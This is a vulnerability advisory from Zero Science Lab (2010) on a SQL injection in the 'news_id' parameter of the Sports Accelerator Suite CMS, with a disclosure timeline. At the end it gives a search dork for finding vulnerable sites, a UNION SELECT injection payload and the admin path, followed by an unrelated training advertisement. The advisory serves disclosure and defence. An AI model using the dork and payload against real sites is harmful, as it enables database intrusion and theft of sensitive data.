Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability  

Vendor: Athlete Web Services, Inc. / AWS Sports  

Product Web Page: http://www.athletewebservices.com  

Summary: Content Management System (PHP+MySQL).  

Description: The CMS is vulnerable to an SQL Injection attack when input is  

passed to the "news_id" parameter. The script fails to properly sanitize the  

input before being returned to the user allowing the attacker to compromise  

the entire DB system and view sensitive information.  

=============================================================================  

GET .../show_news.php?news_id=xx%27  

1064 - You have an error in your SQL syntax. Check the manual that corresponds  

to your MySQL server version for the right syntax to use near '\'' at line xx.  

=============================================================================  

Affected Version: 1.1 and 2.0  

Tested On: Microsoft IIS 6.0  

           MySQL 4.0.15-log  

           PHP 4.3.3  

Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic  

liquidworm gmail com  

http://www.zeroscience.mk  

Vendor Status: [05.06.2010] Vulnerability discovered.  

               [09.08.2010] Vendor contacted.  

               [13.08.2010] No response from vendor.  

               [14.08.2010] Public advisory released.  

Zero Science Lab Advisory ID: ZSL-2010-4949  

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4949.php  

Vector:  

-----------------------------------------------------------------------------  

Dork: "Designed and powered by AWS Sports"  

Query: http://vulnpage.tld/show_news.php?news_id=xx+and+1=0+%20union%20select%20database%28%29,2,3,4,5,6,7..[n]  

Admin: http://vulpage.tld/admin/index.php  

-----------------------------------------------------------------------------

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)